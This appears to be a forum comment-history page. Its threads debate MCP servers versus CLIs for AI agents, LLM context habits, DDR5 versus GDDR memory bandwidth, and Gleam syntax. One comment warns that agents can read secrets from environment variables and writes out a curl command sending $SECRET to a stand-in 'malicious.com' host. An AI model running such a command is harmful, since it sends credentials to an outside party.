More

tymscar · 2026-02-26T00:45:09 1772066709

So basically the best way to use MCP is not to use it at all and just call the APIs directly or through a CLI. If those dont exist then wrapping the MCP into a CLI is the second best thing.

Makes you wonder whats the point of MCP

_pdp_ · 2026-02-26T11:25:18 1772105118

The point of the MCP is for the upstream provider to provider agent specific tools and to handle authentication and session management.

Consider the Google Meet API. To get an actual transcript from Google Meet you need to perform 3-4 other calls before the actual transcript is retrieved. That is not only inefficient but also the agent will likely get it wrong at least once. If you have a dedicated MCP then Google in theory will provide a single transcript retrieval tool which simplifies the process.

The authentication story should not be underestimated either. For better or worse, MCP allows you to dynamically register oauth client through a self registration process. This means that you don't need to register your own client with every single provider. This simplifies oauth significantly. Not everyone supports it because in my opinion it is a security problem but many do.

tymscar · 2026-02-26T11:49:48 1772106588

Or you could just have a cli that does that, no MCP needed

miroljub · 2026-02-26T09:45:30 1772099130

Exactly. You shouldn't use MCPs unless there is some statefulness / state / session they need to maintain between calls.

In all other cases, CLI or API calls are superior.

Eldodi · 2026-02-26T10:49:44 1772102984

There are very few stateful MCP Servers out there, and the standard is moving towards stateless by default.

What is really making MCP stand out is:

- oauth integration

- generalistic IA assistants adoption. If you want to be inside ChatGPT or Claude, you can't provide a CLI.

miroljub · 2026-02-26T11:02:54 1772103774

> What is really making MCP stand out is:

> - oauth integration

I don't see a reason a cli can't provide oauth integration flow. Every single language has an oauth client.

> - generalistic IA assistants adoption. If you want to be inside ChatGPT or Claude, you can't provide a CLI.

This is actually a valid point. I solved it by using a sane agent harness that doesn't have artificial restrictions, but I understand that some people have limited choices there and that MCP provides some benefits there.

Same story as SOAP, even a bad standard is better than no standard at all and every vendor rolling out their own half-baked solution.

zachrip · 2026-02-26T15:14:55 1772118895

Oauth with mcp is more than just traditional oauth. It allows dynamic client registration among other things, so any mcp client can connect to any mcp server without the developers on either side having to issue client ids, secrets, etc. Obviously a cli could use DCR as well, but afaik nobody really does that, and again, your cli doesn't run in claude or chatgpt.

brookst · 2026-02-26T16:03:22 1772121802

Stateful at the application layer, not the transport layer. There are tons of stateful apps that run on UDP. You can build state on top of stateless comms.

jnstrdm05 · 2026-02-26T14:48:32 1772117312

The guy who created fastmcp, he mentioned that you should use mcp to design how an llm should interact with the API, and give it tools that are geared towards solving problems, not just to interact with the API. Very interesting talk on the topic on YouTube. I still think it's a bloated solution.

throwup238 · 2026-02-26T16:50:21 1772124621

> Makes you wonder whats the point of MCP

I only use them for stuff that needs to run in-process, like a QT MCP that gives agents access to the element hierarchy for debugging and interacting with the GUI (like giving it access to Chrome inspector but for QT).

ianm218 · 2026-02-26T00:50:23 1772067023

This was my initial understanding but if you want ai agents to do complex multi step workflows I.e. making data pipelines they just do so much better with MCP.

After I got the MCP working my case the performance difference was dramatic

athrowaway3z · 2026-02-26T09:49:12 1772099352

Yeah this is just straight up nonsense.

Its ability to shuffle around data and use bash and do so in interesting ways far outstrips its ability to deal with MCPs.

Also remember to properly name your cli tools and add a `use <mytool> --help for doing x` in your AGENTS.md, but that is all you need.

Maybe you're stuck on some bloated frontend harness?

ianm218 · 2026-02-26T20:56:36 1772139396

> Yeah this is just straight up nonsense.

I was just sharing my experience I'm not sure what you mean. Just n=1 data point.

From first principles I 100% agree and yes I was using a CLI tool I made with typer that has super clear --help + had documentation that was supposed to guide multi step workflows. I just got much better performance when I tried MCP. I asked Claude Code to explain the diff:

> why does our MCP onbaroding get better performance than the using objapi in order to make these pipelines? Like I can see the performance is better but it doesn't intuitively make sense to me why an mcp does better than an API for the "create a pipeline" workflow

It's not MCP-the-protocol vs API-the-protocol. They hit the same backend. The difference is who the interface was designed for.

  The CLI is a human interface that Claude happens to use. Every objapi pb call means:
  - Spawning a new Python process (imports, config load, HTTP setup)
  - Constructing a shell command string (escaping SQL in shell args is brutal)
  - Parsing Rich-formatted table output back into structured data
  - Running 5-10 separate commands to piece together the current state (conn list, sync list, schema classes, etc.)

  The MCP server is an LLM interface by design. The wins are specific:

  1. onboard://workspace-state resource — one call gives Claude the full picture: connections, syncs, object classes, relations, what exists, what's missing. With the CLI, Claude
  runs a half-dozen commands and mentally joins the output.
  2. Bundled operations — explore_connection returns tables AND their columns, PKs, FKs in one response. The CLI equivalent is conn tables → pick table → conn preview for each. Fewer
   round-trips = fewer places for the LLM to lose the thread.
  3. Structured in, structured out — MCP tools take JSON params, return JSON. No shell escaping, no parsing human-formatted tables. When Claude needs to pass a SQL string with quotes
   and newlines through objapi pb node add sql --sql "...", things break in creative ways.
  4. Tool descriptions as documentation — the MCP tool descriptions are written to teach an LLM the workflow. The CLI --help is written for humans who already know the concepts.
  5. Persistent connection — the MCP server keeps one ObjectsClient alive across all calls. The CLI boots a new Python process per command.

  So the answer is: same API underneath, but the MCP server eliminates the shell-string-parsing impedance mismatch and gives Claude the right abstractions (fewer, chunkier operations
   with full context) instead of making it pretend to be a human at a terminal.

For context I was working on a visual data pipeline builder and was giving it the same API that is used in the frontend - it was doing very poorly with the API.

eli · 2026-02-26T02:31:38 1772073098

I have never had a problem using cli tools intead of mcp. If you add a little list of the available tools to the context it's nearly the same thing, though with added benefits of e.g. being able to chain multiple together in one tool call

ianm218 · 2026-02-26T03:16:21 1772075781

Not doubting you just sharing my experience - was able to get dramatically better experience for multi step workflows that involve feedback from SQL compilers with MCP. Probably the right harness to get the same performance with the right tools around the API calls but was easier to stop fighting it for me

vidarh · 2026-02-26T10:56:46 1772103406

Did you test actually having command line tools that give you the same interface as the MCP's? Because that is what generally what people are recommending as the alternative. Not letting the agent grapple with <random tool> that is returning poorly structured data.

If you option is to have a "compileSQL" MCP tool, and a "compileSQL" CLI tool, that that both return the same data as JSON, the agent will know how to e.g. chain jq, head, grep to extract a subset from the latter in one step, but will need multiple steps with the MCP tool.

The effect compounds. E.g. let's say you have a "generateQuery" tool vs CLI. In the CLI case, you might get it piping the output from one through assorted operations and then straight into the other. I'm sure the agents will eventually support creating pipelines of MCP tools as well, but you can get those benefits today if you have the agents write CLI's instead of bothering with MCP servers.

I've for that matter had to replace MCP servers with scripts that Claude one-shot because the MCP servers lacked functionality... It's much more flexible.

paulddraper · 2026-02-26T03:45:26 1772077526

MCP is just JSON-RPC plus dynamic OAuth plus some lifecycle things.

It’s a convention.

That everyone follows.

crazylogger · 2026-02-26T04:09:50 1772078990

Then you inevitably have to leak your API secret to the LLM in order for it to successfully call the APIs.

MCP is a thin toolcall auth layer that has to be there so that ChatGPT and claude.ai can "connect to your Slack", etc.

tymscar · 2026-02-26T10:00:03 1772100003

No? You can just have env vars

crazylogger · 2026-02-26T10:38:24 1772102304

Setting an env var on a machine the LLM has control over is giving it the secret. When LLM tries `echo $SECRET` or `curl https://malicious.com/api -h secret:$SECRET` (or any one of infinitely many exfiltration methods possible), how do you plan on telling these apart from normal computer use?

Prior art: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

tymscar · 2026-02-24T01:04:02 1771895042

Love the idea, but please add some demo screenshots on GitHub. All UI tools should

eigen-vector · 2026-02-24T02:54:16 1771901656

I've added images to the readme :) Thanks for your feedback!

eigen-vector · 2026-02-24T01:18:29 1771895909

Will do! I agree

tymscar · 2026-01-16T00:43:27 1768524207

https://blog.tymscar.com is my blog. I write mostly about technology and programming

tymscar · 2026-01-12T01:30:29 1768181429

I think you are right in saying that there is some deep intuition that takes months, if not years, to hone about current models, however, the intuition some who did nothing but talk and use LLMs nonstop two years ago would be just as good today as someone who started from scratch, if not worse because of antipatterns that don’t apply anymore, such as always starting a new chat and never using a CLI because of context drift.

Also, Simon, with all due respect, and I mean it, I genuinely look in awe at the amount of posts you have on your blog and your dedication, but it’s clear to anyone that the projects you created and launched before 2022 far exceed anything you’ve done since. And I will be the first to say that I don’t think that’s because of LLMs not being able to help you. But I do think it’s because what makes you really, really good at engineering you kept replacing slowly but surely with LLMs more and more by the month.

If I look at Django, I can clearly see your intelligence, passion, and expertise there. Do you feel that any of the projects you’ve written since LLMs are the main thing you focus on are similar?

Think about it this way: 100% of you wins against 100% of me any day. 100% of Claude running on your computer is the same as 100% of Claude running on mine. 95% of Claude and 5% of you, while still better than me (and your average Joe), is nowhere near the same jump from 95% Claude and 5% me.

I do worry when I see great programmers like you diluting their work.

simonw · 2026-01-12T01:38:00 1768181880

My great regret from the past few years is that experimenting with LLMs has been such a huge distraction from my other work! My https://llm.datasette.io/ tool is from that era though, and it's pretty cool.

tymscar · 2026-01-12T01:47:48 1768182468

I do think your datasettes work is fantastic and I genuinely hope you take my previous message the right way. I’m not saying you do something bad, quite the opposite, I feel like we need more of you and I’m afraid because of LLMs we get less of you.

beaker52 · 2026-01-12T06:50:54 1768200654

(Breaking the 4th wall for a minute):

It’s not just Simon that we’re getting less of, it’s YOU we’re getting less of too. And we want you around. Don’t go.

beaker52 · 2026-01-12T07:15:15 1768202115

> because of antipatterns that don’t apply anymore, such as always starting a new chat

I’m keen to understand your reasoning on this. I don’t agree, but maybe I’m just stuck with old practices, so help me?

What’s your justification as to why starting a new chat is an antipattern?

elliotto · 2026-01-12T20:43:40 1768250620

It used to be that the bots had a short context window, and they struggled with getting confused by past context, so it was much better to make a new chat every now and then to keep the thread on track.

The opposite is true now. The context windows are enormous, and the bots are able to stay on task extremely well. They're able to utilize any previous context you've provided as part of the conversation for the new task, which improves their performance.

The new pattern I am using is a master chat that I only ever change if I am doing something entirely different

beaker52 · 2026-01-12T22:25:59 1768256759

That’s cool. I know context windows are arbitrarily larger now because consumers think that larger window = better, but I think the sentiment that the model can’t even use the window effectively still stands?

I still find LLMs perform best with a potent and focussed context to work with, and performance goes down quite significantly the more context it has.

What’s your experience been?

elliotto · 2026-01-15T02:21:30 1768443690

I worked on a startup experimenting with using gemini-2.0-flash (the year old model) using its full 1m context window to query technical documents. We found it to be extremely successful at needle-in-a-haystack type problems.

As we migrated to newer models (gemini-3.0 and the o4-mini models) we again found it performed even better with x00k tokens. Our system prompt grew to about 20k tokens and the bots were able to handle it perfectly. Our issue became time to first token with large context, rather than the bot quality.

The ultra large 1m+ llama models were reported to be ineffective at >1m context. But at this point, it becomes so cost prohibitive to use anyway.

I am continuing to have success using Cursor's Auto model, and GPT-5.1 with extremely long conversations. I use different chats for different problems moreso for my own compartmentalisation of thoughts, rather than as a necessity for the bot.

jcheng · 2026-01-12T02:09:36 1768183776

> 95% of Claude and 5% of you, while still better than me (and your average Joe), is nowhere near the same jump from 95% Claude and 5% me.

I see what you're saying, but I'm not sure it is true. Take simonw and tymscar, put them each in charge of a team of 19 engineers (of identical capabilities). Is the result "nowhere near the same jump" as simonw vs. tymscar alone? I think it's potentially a much bigger jump, if there are differences in who has better ideas and not just who can code the fastest.

tymscar · 2026-01-12T02:33:07 1768185187

I agree, however there you don’t compare technical knowledge alone, you also compare managerial skills.

With LLMs its admittedly a bit closer to doing it yourself because the feedback loop is much tighter

jcheng · 2026-01-12T18:00:01 1768240801

Yeah... and besides managerial skills, also product (using the word loosely) sense, user empathy, clarity of vision, communication skills. They've always been multipliers for programmers, even more so in this moment.

tymscar · 2026-01-12T18:02:43 1768240963

Are they multipliers when you do less of it and offload more of it to the same tool everyone else uses?

tymscar · 2025-12-30T02:30:02 1767061802

Its one of the main reasons why I buy on steam. Makes games much more engaging, especially for me because I prefer hard action games with little to no story.

tymscar · 2025-12-23T16:46:51 1766508411

Honestly it’s very much worth it! Look into this https://hexdocs.pm/hexdocs_offline/index.html

tymscar · 2025-12-21T01:20:56 1766280056

DDR5 is a couple of orders of magnitude slower than really good vram. That’s one big reason.

zrm · 2025-12-21T08:42:00 1766306520

DDR5 is ~8GT/s, GDDR6 is ~16GT/s, GDDR7 is ~32GT/s. It's faster but the difference isn't crazy and if the premise was to have a lot of slots then you could also have a lot of channels. 16 channels of DDR5-8200 would have slightly more memory bandwidth than RTX 4090.

tymscar · 2025-12-21T14:18:52 1766326732

Yeah, so DDR5 is 8GT and GDDR7 is 32GT. Bus width is 64 vs 384. That already makes the VRAM 4*6 (24) times faster.

You can add more channels, sure, but each channel makes it less and less likely for you to boot. Look at modern AM5 struggling to boot at over 6000 with more than two sticks.

So you’d have to get an insane six channels to match the bus width, at which point your only choice to be stable would be to lower the speed so much that you’re back to the same orders of magnitude difference, really.

Now we could instead solder that RAM, move it closer to the GPU and cross-link channels to reduce noise. We could also increase the speed and oh, we just invented soldered-on GDDR…

zrm · 2025-12-21T19:28:00 1766345280

> Bus width is 64 vs 384.

The bus width is the number of channels. They don't call them channels when they're soldered but 384 is already the equivalent of 6. The premise is that you would have more. Dual socket Epyc systems already have 24 channels (12 channels per socket). It costs money but so does 256GB of GDDR.

> Look at modern AM5 struggling to boot at over 6000 with more than two sticks.

The relevant number for this is the number of sticks per channel. With 16 channels and 64GB sticks you could have 1TB of RAM with only one stick per channel. Use CAMM2 instead of DIMMs and you get the same speed and capacity from 8 slots.

dawnerd · 2025-12-21T01:53:18 1766281998

But it would still be faster than splitting the model up on a cluster though, right? But I’ve also wondered why they haven’t just shipped gpus like cpus.

cogman10 · 2025-12-21T03:00:38 1766286038

Man I'd love to have a GPU socket. But it'd be pretty hard to get a standard going that everyone would support. Look at sockets for CPUs, we barely had cross over for like 2 generations.

But boy, a standard GPU socket so you could easily BYO cooler would be nice.

estimator7292 · 2025-12-21T15:54:05 1766332445

The problem isn't the sockets. It costs a lot to spec and build new sockets, we wouldn't swap them for no reason.

The problem is that the signals and features that the motherboard and CPU expect are different between generations. We use different sockets on different generations to prevent you plugging in incompatible CPUs.

We used to have cross-generational sockets in the 386 era because the hardware supported it. Motherboards weren't changing so you could just upgrade the CPU. But then the CPUs needed different voltages than before for performance. So we needed a new socket to not blow up your CPU with the wrong voltage.

That's where we are today. Each generation of CPU wants different voltages, power, signals, a specific chipset, etc. Within the same +-1 generation you can swap CPUs because they're electrically compatible.

To have universal CPU sockets, we'd need a universal electrical interface standard, which is too much of a moving target.

AMD would probably love to never have to tool up a new CPU socket. They don't make money on the motherboard you have to buy. But the old motherboards just can't support new CPUs. Thus, new socket.

cogman10 · 2025-12-21T02:57:10 1766285830

For AI, really good isn't really a requirement. If a middle ground memory module could be made, then it'd be pretty appealing.

tymscar · 2025-12-13T20:07:08 1765656428

Thank you! I have not played around with Elixir just yet, sadly, so I can't help there, I'm afraid.

tymscar · 2025-12-13T19:40:53 1765654853

You're right, but loads of times I just left that there because I probably did something more involved in the map that I ended up deleting later without realising.

Hasnep · 2025-12-14T04:26:13 1765686373

This sounds like the kind of situation where the LSP could suggest the simpler code, I'll see if there's an issue for it already and suggest it if not.

pdimitar · 2025-12-14T07:49:52 1765698592

Elixir has one opinionated formatter -- Quokka -- that will rewrite the code above properly. It can also reuse linting rules as rewrite policies. Love using it.

tymscar · 2025-12-13T19:39:53 1765654793

You most likely asked an AI for this. They always think there is an `if` keyword in case statements in Gleam. There isn't one, sadly.

EDIT: I am wrong. Apparently there are, but it's a bit of a strange thing where they can only be used as clauses in `if` statements, and without doing any calculations.

WJW · 2025-12-13T19:48:26 1765655306

There is though?

https://tour.gleam.run/flow-control/guards/